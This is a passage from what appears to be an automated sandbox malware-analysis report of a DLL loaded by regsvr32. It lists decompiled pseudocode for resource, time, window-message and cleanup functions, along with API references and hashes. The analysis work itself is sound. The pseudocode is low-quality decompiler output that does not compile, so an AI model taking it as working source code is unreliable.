							__eflags = _t33;
							_a28 =  *(_t51 + 4) & 0x0000ffff;
							_a32 = _t33;
							_a36 =  &(_t59[1]);
							E1001B658(_t38, _t44, _t77, _a32, _a24);
							_t46 = E1001B728(_t38,  *(_t51 + 4) & 0x0000ffff, _t46, _t49, _t77, _t78, _t76);
						}
						FreeResource();
						return _t46;
					}
					_t69 = _t49;
					_t8 = _t51 + 8; // 0x8
					_t74 = _t8;
					do {
						_t40 =  *_t74 & 0x0000ffff;
						r9d = r9d + 1;
						_t74 =  &(_t74[1]);
						 *_t69 = _t40;
						_t69 =  &(_t69[1]);
						__eflags = r9d - ( *(_t51 + 6) & 0x0000ffff);
					} while (r9d < ( *(_t51 + 6) & 0x0000ffff));
					goto L7;
				}
				L1:
				return 0;
			}

















                                                                              0x1001c4ec
                                                                              0x1001c4ec
                                                                              0x1001c4ec
                                                                              0x1001c4ec
                                                                              0x1001c4f9
                                                                              0x1001c4fc
                                                                              0x1001c4ff
                                                                              0x1001c508
                                                                              0x1001c514
                                                                              0x1001c51d
                                                                              0x1001c52c
                                                                              0x1001c532
                                                                              0x1001c538
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001c53d
                                                                              0x1001c543
                                                                              0x1001c546
                                                                              0x1001c549
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001c54b
                                                                              0x1001c55e
                                                                              0x1001c565
                                                                              0x1001c56a
                                                                              0x1001c56d
                                                                              0x1001c572
                                                                              0x1001c575
                                                                              0x1001c599
                                                                              0x1001c599
                                                                              0x1001c5a4
                                                                              0x1001c5a9
                                                                              0x1001c5ac
                                                                              0x1001c5ae
                                                                              0x1001c5b3
                                                                              0x1001c5b5
                                                                              0x1001c5bb
                                                                              0x1001c5bf
                                                                              0x1001c5c3
                                                                              0x1001c5c3
                                                                              0x1001c5c6
                                                                              0x1001c5cf
                                                                              0x1001c5d6
                                                                              0x1001c5e2
                                                                              0x1001c5f2
                                                                              0x1001c5f2
                                                                              0x1001c5f7
                                                                              0x00000000
                                                                              0x1001c5fd
                                                                              0x1001c577
                                                                              0x1001c57a
                                                                              0x1001c57a
                                                                              0x1001c57e
                                                                              0x1001c57e
                                                                              0x1001c582
                                                                              0x1001c586
                                                                              0x1001c58a
                                                                              0x1001c590
                                                                              0x1001c594
                                                                              0x1001c594
                                                                              0x00000000
                                                                              0x1001c57e
                                                                              0x1001c51f
                                                                              0x00000000

                                                                              APIs
                                                                              • FindResourceW.KERNEL32(?,?,?,?,10007FC1), ref: 1001C514
                                                                              • LoadResource.KERNEL32(?,?,?,?,10007FC1), ref: 1001C52C
                                                                              • LockResource.KERNEL32(?,?,?,?,10007FC1), ref: 1001C53D
                                                                              • FreeResource.KERNEL32(?,?,?,?,10007FC1), ref: 1001C5F7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: 3fe38ae75f6155880c904ff7c563b1e8b6095daf6aaadd202cbce3aac82ac4fc
                                                                              • Instruction ID: e37d880a46b41daa7ec30c74fdd18f490f2f1559d9d7c729acda1126a89f3a68
                                                                              • Opcode Fuzzy Hash: 3fe38ae75f6155880c904ff7c563b1e8b6095daf6aaadd202cbce3aac82ac4fc
                                                                              • Instruction Fuzzy Hash: 2121E4B670169086DB04CF26B804B6EB7D1EB49FD5F094229AE4A4F754EE3CD4C0CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10031188 Relevance: 6.1, APIs: 4, Instructions: 82timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 66%
                                                                              			E10031188(void* __rcx, void* __rdx, char _a16) {
				intOrPtr _v52;
				intOrPtr _v56;
				void _v60;
				void _v64;
				void _v68;
				void _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v86;
				short _v88;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				short _t24;
				short _t26;
				int _t32;
				void* _t40;
				void* _t53;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_t67 = __rcx;
				_t86 = __rdx;
				_t85 = __rcx;
				if(__rdx == 0) {
					E10016544();
					asm("int3");
				}
				if(E1003C090(_t40, _t53, _t65, _t66,  &_v72, _t67, _t85, _t86, _t87, _t88) != 0) {
					_t24 = 0;
				} else {
					_t24 = _v52 + 0x76c;
				}
				_v88 = _t24;
				if(E1003C090(_t40, _t53, _t65, _t66,  &_v72, _t85, _t85, _t86, _t87, _t88) != 0) {
					_t26 = 0;
				} else {
					_t26 = _v56 + 1;
				}
				_v86 = _t26;
				E1003C090(_t40, _t53, _t65, _t66,  &_v72, _t85, _t85, _t86, _t87, _t88);
				_t44 =  ==  ? _v60 : 0;
				_v82 =  ==  ? _v60 : 0;
				E1003C090(_t40, _t53, _t65, _t66,  &_v72, _t85, _t85, _t86, _t87, _t88);
				_t46 =  ==  ? _v64 : 0xffffffff;
				_v80 =  ==  ? _v64 : 0xffffffff;
				E1003C090(0xffffffff, _t53, _t65, _t66,  &_v72, _t85, _t85, _t86, _t87, _t88);
				_t48 =  ==  ? _v68 : 0xffffffff;
				_v78 =  ==  ? _v68 : 0xffffffff;
				E1003C090(0xffffffff, _t53, _t65, _t66,  &_v72, _t85, _t85, _t86, _t87, _t88);
				_v74 = 0;
				_t42 =  ==  ? _v72 : 0xffffffff;
				_v76 =  ==  ? _v72 : 0xffffffff;
				if(SystemTimeToFileTime(??, ??) == 0) {
					E10031C5C(GetLastError(), _t65, _t66,  &_a16, _t85, _t86);
				}
				_t84 = _t86;
				_t32 = LocalFileTimeToFileTime(??, ??);
				if(_t32 == 0) {
					return E10031C5C(GetLastError(), _t65, _t66, _t84, _t85, _t86);
				}
				return _t32;
			}
































                                                                              0x10031188
                                                                              0x10031193
                                                                              0x10031196
                                                                              0x10031199
                                                                              0x1003119b
                                                                              0x100311a0
                                                                              0x100311a0
                                                                              0x100311b0
                                                                              0x100311bd
                                                                              0x100311b2
                                                                              0x100311b6
                                                                              0x100311b6
                                                                              0x100311c7
                                                                              0x100311d3
                                                                              0x100311de
                                                                              0x100311d5
                                                                              0x100311d9
                                                                              0x100311d9
                                                                              0x100311e8
                                                                              0x100311ed
                                                                              0x100311f9
                                                                              0x100311fe
                                                                              0x10031208
                                                                              0x10031219
                                                                              0x1003121e
                                                                              0x10031228
                                                                              0x10031234
                                                                              0x10031239
                                                                              0x10031243
                                                                              0x10031257
                                                                              0x1003125e
                                                                              0x10031263
                                                                              0x10031270
                                                                              0x1003127c
                                                                              0x1003127c
                                                                              0x10031289
                                                                              0x1003128c
                                                                              0x10031294
                                                                              0x00000000
                                                                              0x100312a0
                                                                              0x100312ac

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$ErrorLast$LocalSystem
                                                                              • String ID:
                                                                              • API String ID: 1172841412-0
                                                                              • Opcode ID: e2932548eacbe1719149137c14b93fe855301492a879f661561706fe3c50289e
                                                                              • Instruction ID: eb760cbaa439c0c5466d45982444f3844c7fe4d476e8179d8f1e26444ed40450
                                                                              • Opcode Fuzzy Hash: e2932548eacbe1719149137c14b93fe855301492a879f661561706fe3c50289e
                                                                              • Instruction Fuzzy Hash: 5121EB6632454085DB55DB31E94479BA361FFCC7C5F405125FA4AC7A68FF38C5048B04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10052F44 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 17%
                                                                              			E10052F44(void* __edx, struct _CRITICAL_SECTION* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r9) {
				int _t16;
				void* _t17;
				void* _t23;
				intOrPtr _t26;
				struct _CRITICAL_SECTION* _t27;
				struct _CRITICAL_SECTION* _t28;
				struct _CRITICAL_SECTION* _t29;
				void* _t38;

				_t38 = __rsi;
				_t29 = __rcx;
				_push(__rsi);
				_t27 = __rcx;
				if(__rcx != 0) {
					if( *((intOrPtr*)(__rcx)) == 0) {
						L12:
						_t17 = 0;
						goto L13;
					} else {
						if( *((intOrPtr*)(__rcx)) != 0x48) {
							goto L1;
						} else {
							_t23 = 0;
							if( *((intOrPtr*)(__rcx + 0x40)) <= 0) {
								L9:
								_t30 =  *((intOrPtr*)(_t27 + 0x38));
								if( *((intOrPtr*)(_t27 + 0x38)) != 0) {
									E10039620(_t26, _t30);
									 *((long long*)(_t27 + 0x38)) = 0;
								}
								 *(_t27 + 0x40) = 0;
								 *(_t27 + 0x44) = 0;
								DeleteCriticalSection(??);
								 *_t27 = 0;
								goto L12;
							} else {
								while(_t38 >= 0 && _t23 <  *(_t27 + 0x40)) {
									_t26 =  *((intOrPtr*)(_t27 + 0x38));
									_t16 = UnregisterClassA(??, ??);
									_t23 = _t23 + 1;
									_t38 = _t38 + 2;
									if(_t23 <  *(_t27 + 0x40)) {
										continue;
									} else {
										goto L9;
									}
									goto L18;
								}
								r9d = 0;
								r8d = 0;
								RaiseException(??, ??, ??, ??);
								asm("int3");
								asm("int3");
								asm("int3");
								_t28 = _t29;
								DeleteCriticalSection(_t27);
								_t33 =  *((intOrPtr*)(_t28 + 0x50));
								if( *((intOrPtr*)(_t28 + 0x50)) != 0) {
									_t16 = E10039620(_t26, _t33);
									 *((long long*)(_t28 + 0x50)) = 0;
								}
								 *(_t28 + 0x58) = 0;
								 *(_t28 + 0x5c) = 0;
								return _t16;
							}
						}
					}
				} else {
					L1:
					_t17 = 0x80070057;
					L13:
					return _t17;
				}
				L18:
			}











                                                                              0x10052f44
                                                                              0x10052f44
                                                                              0x10052f47
                                                                              0x10052f53
                                                                              0x10052f56
                                                                              0x10052f62
                                                                              0x10052fcd
                                                                              0x10052fcd
                                                                              0x00000000
                                                                              0x10052f64
                                                                              0x10052f67
                                                                              0x00000000
                                                                              0x10052f69
                                                                              0x10052f69
                                                                              0x10052f6e
                                                                              0x10052f99
                                                                              0x10052f99
                                                                              0x10052fa0
                                                                              0x10052fa2
                                                                              0x10052fa7
                                                                              0x10052fa7
                                                                              0x10052fb3
                                                                              0x10052fba
                                                                              0x10052fc1
                                                                              0x10052fc7
                                                                              0x00000000
                                                                              0x10052f70
                                                                              0x10052f72
                                                                              0x10052f7c
                                                                              0x10052f87
                                                                              0x10052f8d
                                                                              0x10052f90
                                                                              0x10052f97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10052f97
                                                                              0x10052fd8
                                                                              0x10052fdb
                                                                              0x10052fe7
                                                                              0x10052fed
                                                                              0x10052fee
                                                                              0x10052fef
                                                                              0x10052ff6
                                                                              0x10052ffd
                                                                              0x10053003
                                                                              0x1005300a
                                                                              0x1005300c
                                                                              0x10053011
                                                                              0x10053011
                                                                              0x10053019
                                                                              0x10053020
                                                                              0x1005302c
                                                                              0x1005302c
                                                                              0x10052f6e
                                                                              0x10052f67
                                                                              0x10052f58
                                                                              0x10052f58
                                                                              0x10052f58
                                                                              0x10052fcf
                                                                              0x10052fd7
                                                                              0x10052fd7
                                                                              0x00000000

                                                                              APIs
                                                                              • UnregisterClassA.USER32 ref: 10052F87
                                                                              • DeleteCriticalSection.KERNEL32 ref: 10052FC1
                                                                              • RaiseException.KERNEL32 ref: 10052FE7
                                                                              • DeleteCriticalSection.KERNEL32 ref: 10052FFD
                                                                                • Part of subcall function 10039620: HeapFree.KERNEL32 ref: 10039636
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDeleteSection$ClassExceptionFreeHeapRaiseUnregister
                                                                              • String ID:
                                                                              • API String ID: 1438553184-0
                                                                              • Opcode ID: 4db95dc28afa64214143f112a9d55921692559d2f00161da066fda8273329969
                                                                              • Instruction ID: 50e8fee70c6bc36ff3966b56258d27f0e491a1eddfb29560d2b38231f5ba7d38
                                                                              • Opcode Fuzzy Hash: 4db95dc28afa64214143f112a9d55921692559d2f00161da066fda8273329969
                                                                              • Instruction Fuzzy Hash: 9E218B76702650CBEB5ACF65F85175C3771EB45F99F054030EE090B284DB7988CACB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10027380 Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 4142876296-0
                                                                              • Opcode ID: f5d46494a1f594f7584e6c426ce6d859549c8b506004f7a03cc5a20c9cacae72
                                                                              • Instruction ID: 7cb7aa1cdecdd4819103737180a393924bcae34907c4a60271599a9a830d86c6
                                                                              • Opcode Fuzzy Hash: f5d46494a1f594f7584e6c426ce6d859549c8b506004f7a03cc5a20c9cacae72
                                                                              • Instruction Fuzzy Hash: 40212376314B8182D711DB25F89035A67A0FB88BF4F955321EAAD837E4DF68C985C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10019544 Relevance: 6.1, APIs: 4, Instructions: 64windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 52%
                                                                              			E10019544(void* __esi, intOrPtr __rax, long long __rcx, void* __rdx) {
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t45;
				long long _t46;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;

				_t54 = __rdx;
				_t45 = __rax;
				_t38 = __esi;
				_t57 =  *((intOrPtr*)(__rcx));
				_t56 = __rdx;
				_t1 = _t54 + 2; // 0x100000001
				_t39 = _t1;
				_t46 = __rcx;
				_t33 =  >  ? _t39 : 0xffffffff;
				if( *((intOrPtr*)( *((intOrPtr*)(__rcx)) + 0x2c8))() != 0) {
					L11:
					return _t39;
				}
				_t48 =  *((intOrPtr*)(__rcx + 0x70));
				if( *((intOrPtr*)(__rcx + 0x70)) == 0) {
					GetParent();
					_t48 = __rax;
				}
				E10011808(_t30, _t33, _t45, _t48, _t54, _t57, _t59, _t60);
				E1000A5CC(_t30, _t31, _t33, _t38, _t45, _t48, _t54, _t57, _t59, _t60);
				if(_t56 != 0xffffffff) {
					if(( *(_t46 + 0xd8) & 0x00000008) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) != _t56) {
						 *((long long*)(_t45 + 0xa0)) = _t46;
						r9d = 0;
						SendMessageW(??, ??, ??, ??);
						 *(_t46 + 0xd8) =  *(_t46 + 0xd8) | 0x00000008;
						r8d = 0xc8;
						E10018984();
						goto L11;
					} else {
						goto L9;
					}
				} else {
					 *((long long*)(_t45 + 0xa0)) = 0;
					if(( *(_t46 + 0xd8) & 0x00000008) == 0) {
						KillTimer();
						L9:
						return 0;
					}
					r9d = 0;
					r8d = 0xe001;
					SendMessageW(??, ??, ??, ??);
					 *(_t46 + 0xd8) =  *(_t46 + 0xd8) & 0xfffffff7;
					goto L11;
				}
			}














                                                                              0x10019544
                                                                              0x10019544
                                                                              0x10019544
                                                                              0x1001954d
                                                                              0x10019550
                                                                              0x10019558
                                                                              0x10019558
                                                                              0x1001955e
                                                                              0x10019561
                                                                              0x1001956d
                                                                              0x1001962e
                                                                              0x00000000
                                                                              0x1001962e
                                                                              0x10019573
                                                                              0x1001957a
                                                                              0x10019580
                                                                              0x10019586
                                                                              0x10019586
                                                                              0x10019589
                                                                              0x10019591
                                                                              0x1001959a
                                                                              0x100195e9
                                                                              0x100195f8
                                                                              0x10019603
                                                                              0x1001960e
                                                                              0x10019614
                                                                              0x10019620
                                                                              0x10019629
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001959c
                                                                              0x1001959c
                                                                              0x100195ae
                                                                              0x100195da
                                                                              0x100195f4
                                                                              0x00000000
                                                                              0x100195f4
                                                                              0x100195b4
                                                                              0x100195bc
                                                                              0x100195c2
                                                                              0x100195c8
                                                                              0x00000000
                                                                              0x100195c8

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: KillMessageParentSendTimer
                                                                              • String ID:
                                                                              • API String ID: 2710755332-0
                                                                              • Opcode ID: ff7e9a19e86728cce63e9ee01eeeeb756f618af5a2cb2d475efa4c25717cab4c
                                                                              • Instruction ID: a3546b3487d863e9110967ea05ec2bc6d38a787fc0850653dc54b145f2504828
                                                                              • Opcode Fuzzy Hash: ff7e9a19e86728cce63e9ee01eeeeb756f618af5a2cb2d475efa4c25717cab4c
                                                                              • Instruction Fuzzy Hash: EE219F32B01A8582E756CB61E8443983A90F786FE9F558235CE695B7D4DF34C4C98310
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002BD30 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 52%
                                                                              			E1002BD30(void* __eax, void* __edx, void* __esi, void* __rax, void* __rcx, void* __rdx, signed long long __r8, void* __r9, void* __r11) {
				void* _t17;
				void* _t19;
				void* _t24;
				void* _t25;
				void* _t36;
				void* _t37;
				signed long long _t38;
				void* _t41;

				_t42 = __r11;
				_t41 = __r9;
				_t38 = __r8;
				_t34 = __rdx;
				_t24 = __rax;
				_t19 = __edx;
				E100116FC();
				_t17 = 0;
				if(__eax != 0) {
					E10016020(__rcx);
					asm("bt eax, 0x8");
					if(__eflags >= 0) {
						L10:
						return 1;
					}
					E10013600(__esi, _t24, __rcx, __rdx, __r11);
					__eflags = _t24 - _t25;
					_t36 = _t24;
					if(_t24 == _t25) {
						E10016544();
						asm("int3");
					}
					GetForegroundWindow();
					E10011808(_t17, _t19, _t24, _t24, _t34, _t38, _t41, _t42);
					__eflags = _t36 - _t24;
					_t37 = _t24;
					if(_t36 == _t24) {
						L8:
						_t17 = 1;
						goto L9;
					} else {
						GetLastActivePopup();
						E10011808(_t17, _t19, _t24, _t24, _t34, _t38, _t41, _t42);
						__eflags = _t24 - _t37;
						if(_t24 != _t37) {
							L9:
							asm("dec ebp");
							r9d = 0;
							__eflags = (_t38 & 0xfffffffc) + 8;
							SendMessageW(??, ??, ??, ??);
							goto L10;
						}
						r9d = 0;
						_t3 = _t41 + 0x40; // 0x40
						r8d = _t3;
						SendMessageW(??, ??, ??, ??);
						__eflags = _t24 - _t25;
						if(_t24 == _t25) {
							goto L9;
						}
						goto L8;
					}
				}
				return 0;
			}











                                                                              0x1002bd30
                                                                              0x1002bd30
                                                                              0x1002bd30
                                                                              0x1002bd30
                                                                              0x1002bd30
                                                                              0x1002bd30
                                                                              0x1002bd3c
                                                                              0x1002bd41
                                                                              0x1002bd45
                                                                              0x1002bd51
                                                                              0x1002bd56
                                                                              0x1002bd5a
                                                                              0x1002bde2
                                                                              0x00000000
                                                                              0x1002bde2
                                                                              0x1002bd63
                                                                              0x1002bd68
                                                                              0x1002bd6b
                                                                              0x1002bd6e
                                                                              0x1002bd70
                                                                              0x1002bd75
                                                                              0x1002bd75
                                                                              0x1002bd76
                                                                              0x1002bd7f
                                                                              0x1002bd84
                                                                              0x1002bd87
                                                                              0x1002bd8a
                                                                              0x1002bdbe
                                                                              0x1002bdbe
                                                                              0x00000000
                                                                              0x1002bd8c
                                                                              0x1002bd90
                                                                              0x1002bd99
                                                                              0x1002bd9e
                                                                              0x1002bda1
                                                                              0x1002bdc3
                                                                              0x1002bdce
                                                                              0x1002bdd1
                                                                              0x1002bdd8
                                                                              0x1002bddc
                                                                              0x00000000
                                                                              0x1002bddc
                                                                              0x1002bda7
                                                                              0x1002bdaf
                                                                              0x1002bdaf
                                                                              0x1002bdb3
                                                                              0x1002bdb9
                                                                              0x1002bdbc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002bdbc
                                                                              0x1002bd8a
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ActiveForegroundLastPopupWindow
                                                                              • String ID:
                                                                              • API String ID: 964860426-0
                                                                              • Opcode ID: 2566bf255b6855b1e37a1665dd88c3e0333a43e625449deeea1c28de7261f5ea
                                                                              • Instruction ID: a86e364ef6bb1d65d4ae7e474ea9fa09fa51ed4fc68ae1088c16653976434446
                                                                              • Opcode Fuzzy Hash: 2566bf255b6855b1e37a1665dd88c3e0333a43e625449deeea1c28de7261f5ea
                                                                              • Instruction Fuzzy Hash: C5010426B01A8147EB14D771FC957E81250EB897E5F518A30DE5A4BB81EE79D8C4C200
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100126C8 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E100126C8(intOrPtr __edx, void* __ebp, void* __rax, intOrPtr __rdx, long long __r8, long long __r9, void* __r10, intOrPtr _a16, long long _a24, intOrPtr _a40, intOrPtr _a48) {
				intOrPtr _v48;
				long long _v56;
				struct HWND__* _t15;
				void* _t21;
				void* _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t37;
				long long _t43;
				void* _t53;
				void* _t54;

				_t53 = __r10;
				_t42 = __rdx;
				_t35 = __rax;
				_t28 = __ebp;
				_t23 = __edx;
				_a24 = __r8;
				_a16 = __edx;
				_t43 = __r9;
				_t15 = GetTopWindow(??);
				_t36 = __rax;
				if(__rax == 0) {
					L10:
					return _t15;
				} else {
					_t26 = _a48;
					_t27 = _a40;
					do {
						_t37 = _t36;
						if(_t26 == 0) {
							_t48 = _a24;
							SendMessageW(??, ??, ??, ??);
						} else {
							E10011844(_t21, _t22, _t27, _t35, _t37, _t42, _t54);
							if(_t35 != 0) {
								r8d = _a16;
								_t42 =  *((intOrPtr*)(_t35 + 0x40));
								_v56 = _t43;
								E10012288(_t21, _t22, _t23, _t27, _t28, _t35, _t35,  *((intOrPtr*)(_t35 + 0x40)), _t48, _a24, _t53, _t54);
							}
						}
						if(_t27 != 0) {
							GetTopWindow();
							if(_t35 != 0) {
								_t48 = _a24;
								_v48 = _t26;
								_v56 = _t27;
								E100126C8(_a16, _t28, _t35, _t42, _a24, _t43, _t53);
							}
						}
						_t23 = 2;
						_t15 = GetWindow(??, ??);
						_t36 = _t35;
					} while (_t35 != 0);
					goto L10;
				}
			}

















                                                                              0x100126c8
                                                                              0x100126c8
                                                                              0x100126c8
                                                                              0x100126c8
                                                                              0x100126c8
                                                                              0x100126c8
                                                                              0x100126cd
                                                                              0x100126d9
                                                                              0x100126dc
                                                                              0x100126e5
                                                                              0x100126e8
                                                                              0x10012784
                                                                              0x1001278c
                                                                              0x100126ee
                                                                              0x100126ee
                                                                              0x100126f5
                                                                              0x100126fc
                                                                              0x100126fe
                                                                              0x10012701
                                                                              0x1001272a
                                                                              0x10012736
                                                                              0x10012703
                                                                              0x10012703
                                                                              0x1001270b
                                                                              0x10012712
                                                                              0x10012717
                                                                              0x1001271e
                                                                              0x10012723
                                                                              0x10012723
                                                                              0x1001270b
                                                                              0x1001273e
                                                                              0x10012743
                                                                              0x1001274c
                                                                              0x1001274e
                                                                              0x1001275d
                                                                              0x10012761
                                                                              0x10012765
                                                                              0x10012765
                                                                              0x1001274c
                                                                              0x1001276a
                                                                              0x10012772
                                                                              0x1001277b
                                                                              0x1001277b
                                                                              0x00000000
                                                                              0x100126fc

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
